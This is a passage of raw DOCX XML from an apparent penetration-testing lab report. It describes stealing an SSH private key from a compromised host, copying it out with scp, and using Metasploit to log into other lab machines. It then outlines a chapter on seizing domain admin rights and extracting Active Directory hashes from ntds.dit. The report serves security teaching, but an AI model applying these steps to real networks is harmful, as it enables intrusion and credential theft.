      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc30420"/>
      <w:r>
        <w:t xml:space="preserve">9.4 Passing Around SSH Keys </w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1A1183BC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="671"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Even if an attacker cannot obtain administrative privileges on a compromised system, it may still be useful as a pivot point for accessing other machines in the network. SSH keys found on the system may provide access to other hosts where the same user account is authorized. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF78529" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC42C6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSH keys are commonly stored in the .ssh directory within a user’s home folder. If private keys are discovered, they may potentially be used to authenticate to other systems that trust that key. In some environments, users reuse SSH keys across multiple servers. This practice can allow an attacker to move laterally between systems using the same key. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A6759" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B6466" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 16, shows the contents of an SSH private key stored in the .ssh directory of the compromised system. The private key file pentestkey is displayed using the cat command, revealing the RSA private key used for SSH authentication. The key is then copied into a new file named stolensshkey and transferred to another machine using the scp command. After entering the password for the remote system, the file transfer completes successfully. This demonstrates how SSH private keys discovered on a compromised host can be copied and moved to another system for further authentication testing or analysis. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B877732" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2842" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F12671A" wp14:editId="200A233E">
            <wp:extent cx="4272915" cy="3447542"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2405" name="Picture 2405"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2405" name="Picture 2405"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4272915" cy="3447542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4805A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16: Extracting and Transferring the Stolen SSH Private Key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEC9F3C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5B6E2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 17 show the use of the Metasploit module auxiliary/scanner/ssh/ssh_login_pubkey to test SSH authentication across multiple target hosts. The RHOSTS option is set to three </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65E022" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IP addresses, and the module is executed to attempt login using the previously obtained SSH private key. During the scan, the module tests each system for successful  authentication. The output shows that authentication was successful on host 10.0.10.199, where access was granted to the user. As a result, Metasploit automatically opened an SSH session to the target system. This demonstrates how stolen SSH keys can be used to authenticate to other machines within a network and potentially enable lateral movem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B543EA3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="62" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF6D059" wp14:editId="7AA3C377">
            <wp:extent cx="5943600" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2407" name="Picture 2407"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2407" name="Picture 2407"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1554480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3B53A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="17" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C4CE3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 17: Authenticating to Multiple Systems Using a Stolen SSH Private Key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E59A3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E18C65" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3D1CA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="56" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23F6B8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 18 hows the output of the sessions command in Metasploit after successfully authenticating to a remote host using an SSH private key. The results display one active session, indicating that a shell connection has been established to the system at 10.0.10.199 using the user account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCBD7F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778EA3F6" wp14:editId="36351EC3">
            <wp:extent cx="5943600" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2443" name="Picture 2443"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2443" name="Picture 2443"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1569720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE8403" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 18: Viewing Active Sessions Created by the Metasploit Module </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB1685" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FBC555" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCE1FA1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A01D7C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497E827" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1EC4C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC2E811" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364DA074" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B115888" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E43CE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="2326"/>
        </w:tabs>
        <w:ind w:left="-15" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc30421"/>
      <w:r>
        <w:t xml:space="preserve">Chapter 10 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5DFC0CFA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifying domain admin users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AB62D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding systems where domain admins are logged in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BB0A4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Understanding Volume Shadow Copies (VSS) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29346AAE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessing the ntds.dit database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED6CA7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracting Active Directory password hashes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E1B88" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter focuses on the final stage of post-exploitation, which is gaining full control of an enterprise network. This is achieved by obtaining domain administrator privileges in Active Directory.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58231A94" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domain admins have complete access to all systems connected to the domain, meaning they can log into any machine and control critical business operations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF885D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because most business functions rely on domain-connected systems, gaining domain admin access can impact areas such as finance, HR, IT, and operations. For this reason, it represents one of the most serious security risks in an organization. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF4781" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6F309" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In diagram 4, it shows the full process of gaining control over an Active Directory network. It starts from the attacking machine, where domain admin users are first identified. Next, multiple systems are checked to find where a domain admin is currently logged in. Once a system with an active domain admin session is found, their access is used to elevate privileges by either impersonating their token or extracting their credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22666B93" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="21" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39AEEF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3209" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE9E533" wp14:editId="5E0A9E82">
            <wp:extent cx="4037838" cy="3046095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2508" name="Picture 2508"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2508" name="Picture 2508"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4037838" cy="3046095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8DA13" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diagram 4: Controlling the entire Active Directory domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2B6D0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC0DF8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="145"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc30422"/>
      <w:r>
        <w:t xml:space="preserve">10.1 Identifying domain admin user accounts </w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3570DD14" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="205"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first step is to identify which users have domain admin privileges. These users belong to a specific group within Active Directory that grants full control over the domain.Once access to a </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows system is available, built-in system tools can be used to list members of this group. This provides a clear view of which accounts have the highest level of access. In large organizations, there may be many domain admin accounts. The more accounts that exist, the higher the chance of finding one actively in use on a system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DE1704" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="146"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc30423"/>
      <w:r>
        <w:t xml:space="preserve">10.1.1 Using net to query Active Directory groups </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7425CA9E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 19, it shows an RDP session established to the Nappa server using the domain account CAPSULECORP\testuser1. It shows successful remote access to the Windows Server 2008 R2 system within the capsulecorp.local domain, confirming that the newly created domain user has valid authentication and interactive login capabilities on the target machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB0B41" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2609" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586FB7EB" wp14:editId="50EF9247">
            <wp:extent cx="4416425" cy="2852293"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2559" name="Picture 2559"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2559" name="Picture 2559"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4416425" cy="2852293"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BA032" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 19: RDP Session from Goku to Nappa Using Test User 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4D6101" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F17BD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E863B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C02D5F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99683C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E408DA6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
